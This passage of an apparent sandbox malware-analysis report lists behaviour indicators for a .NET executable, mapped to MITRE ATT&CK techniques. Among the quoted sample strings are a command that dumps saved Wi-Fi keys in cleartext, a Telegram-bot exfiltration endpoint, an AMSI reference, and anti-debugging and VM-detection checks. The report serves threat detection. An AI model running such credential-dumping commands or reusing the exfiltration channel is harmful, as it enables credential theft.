\"C:\\FLTLIB.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\V4.0\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\STANDARDS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual environment by using API string", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"HMACSHA256\" (Indicator: \"HMAC\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"HMACSHA256\" (Indicator: \"HMACSHA256\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"Aes256\" (Indicator: \"Aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"SHA256Managed\" (Indicator: \"SHA256Managed\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"RijndaelManaged\" (Indicator: \"Rijndael\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"RijndaelManaged\" (Indicator: \"RijndaelManaged\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"CryptoStreamMode\" (Indicator: \"CryptoStream\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"CryptoConfig\" (Indicator: \"CryptoConfig\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"CryptoStream\" (Indicator: \"CryptoStream\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"cAesGcm\" (Indicator: \"Aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"cAesGcm\" (Indicator: \"AesGcm\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"SymmetricAlgorithm\" (Indicator: \"SymmetricAlgorithm\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"AsymmetricAlgorithm\" (Indicator: \"AsymmetricAlgorithm\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"HashAlgorithm\" (Indicator: \"HashAlgorithm\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"CryptographicException\" (Indicator: \"CryptographicException\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"MD5CryptoServiceProvider\" (Indicator: \"MD5CryptoServiceProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"AesCryptoServiceProvider\" (Indicator: \"Aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"AesCryptoServiceProvider\" (Indicator: \"AesCryptoServiceProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"Rfc2898DeriveBytes\" (Indicator: \"DeriveBytes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"Rfc2898DeriveBytes\" (Indicator: \"Rfc2898DeriveBytes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to \"HMACSHA256\" (Indicator: \"HMAC\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"HMACSHA256\" (Indicator: \"HMACSHA256\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"Aes256\" (Indicator: \"Aes\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"SHA256Managed\" (Indicator: \"SHA256Managed\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"RijndaelManaged\" (Indicator: \"Rijndael\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"RijndaelManaged\" (Indicator: \"RijndaelManaged\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"CryptoStreamMode\" (Indicator: \"CryptoStream\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"CryptoConfig\" (Indicator: \"CryptoConfig\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"CryptoStream\" (Indicator: \"CryptoStream\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"cAesGcm\" (Indicator: \"Aes\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"cAesGcm\" (Indicator: \"AesGcm\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to \"SymmetricAlgorithm\" (Indicator: \"SymmetricAlgorithm\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetLastWriteTime\" (Indicator: \"SetLastWriteTime\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"SetCreationTime\" (Indicator: \"SetCreationTime\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"SetLastAccessTime\" (Indicator: \"SetLastAccessTime\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"SetLastWriteTime\" (Indicator: \"SetLastWriteTime\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"SetCreationTime\" (Indicator: \"SetCreationTime\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"SetLastAccessTime\" (Indicator: \"SetLastAccessTime\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-231", "type": 2, "relevance": 1, "name": "Contains strings related to AMSI (Anti Malware Scan Interface)", "description": "Observed string: \"AmsiScanBuffer\" (Indicator: \"amsiscanbuffer\") in Source: 00000000-00006044.00000000.66236.0026B000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-116", "relevance": 1, "name": "Contains ability to decompress content at runtime", "description": "Observed function \"System.IO.Compression.ZipFile\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"System.IO.Compression.GZipStream\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-107", "relevance": 1, "name": "Contains ability to load content into memory (Dotnet)", "description": "Observed namespace \"System.IO.MemoryStream\" and TypeReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"ToArray\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"PtrToStructure\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"SizeOf\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadIntPtr\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"PtrToStringUni\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadByte\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadInt16\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadInt32\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"FreeHGlobal\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"AllocHGlobal\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-134", "relevance": 1, "name": "Dotnet file contains encryption/decryption functions", "description": "Observed namespace \"System.Security.Cryptography\" and MemberReference \"CreateDecryptor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"CheckRemoteDebuggerPresent\" (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindowTitle\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindowTitle\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetCreationTime\" (Indicator: \"GetCreationTime\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetCreationTime\" (Indicator: \"GetCreationTime\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-513", "type": 2, "relevance": 1, "name": "References to WMI query strings used for process discovery", "description": "Found string \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"/sendMessage?chat_id=\" (Indicator: \"sendmessage\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"sendMessage?chat_id=\" (Indicator: \"sendmessage\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetKeyboardLayout\" (Indicator: \"GetKeyboardLayout\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetKeyboardLayout\" (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00006044-00000C29-56594521\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"Select * from Win32_ComputerSystem\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_VideoController\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select * from AntivirusProduct\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \"select * from \"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_VideoController\" (Indicator: \"select * from \"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \"select * from \"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \"select * from \"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" queries volume information of \"C:\\3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" at 00000000-00006044-0000010C-4105218", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-688", "type": 2, "relevance": 1, "name": "Able to find string content in a file", "description": "Found string \"/C chcp 65001 && netsh wlan show profile | findstr All\" (File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"\\\" key=clear | findstr Key\" (File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"), Found string \"netsh wlan show profile | findstr All\" (File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"ar | findstr Key\" (File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\"), Found string \"key=clear | findstr Key\" (Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009d001c02000000000000000000000000000000000000140098001c0200000000000000000000086d2f0000000000200000000000000000000000804a3100f8692f00186b2f00d0993100c06e2f0000000000acf367000000000008f6670095e1c477302d1700feffffffff2bc8779a2ac87764c5ab77b69fc877000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5ab77d099310064c5ab77 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RtlGetVersion\" with parameter 